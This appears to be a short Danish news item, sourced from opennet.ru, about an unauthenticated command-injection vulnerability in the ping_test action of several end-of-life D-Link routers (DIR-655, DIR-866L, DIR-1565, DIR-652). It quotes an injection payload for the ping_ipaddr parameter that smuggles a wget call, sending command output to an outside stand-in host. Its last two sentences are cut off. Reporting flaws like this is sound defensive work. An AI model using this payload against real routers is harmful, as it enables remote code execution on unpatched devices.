I D-Link trådløse routere
Interessant nok skal "ping_test"-kaldet ifølge firmwareudviklerne kun udføres efter godkendelse, men i virkeligheden kaldes det under alle omstændigheder, uanset om du logger ind på webgrænsefladen. Især når man får adgang til scriptet apply_sec.cgi og sender parameteren "action=ping_test", omdirigerer scriptet til godkendelsessiden, men udfører samtidig handlingen forbundet med ping_test. For at udføre koden blev der brugt en anden sårbarhed i selve ping_test, som kalder ping-værktøjet uden at kontrollere rigtigheden af den IP-adresse, der blev sendt til test. For at kalde værktøjet wget og overføre resultaterne af kommandoen "echo 1234" til en ekstern vært, skal du blot angive parameteren "ping_ipaddr=127.0.0.1%0awget%20-P%20/tmp/%20http:// test.test/?$( echo 1234)".
Tilstedeværelsen af sårbarheden er officielt bekræftet i følgende modeller:
- DIR-655 med firmware 3.02b05 eller ældre;
- DIR-866L med firmware 1.03b04 eller ældre;
- DIR-1565 med firmware 1.01 eller ældre;
- DIR-652 (ingen information om problematiske firmwareversioner er givet)
Supportperioden for disse modeller er allerede udløbet, så D-Link
Det blev senere opdaget, at sårbarheden også var
Kilde: opennet.ru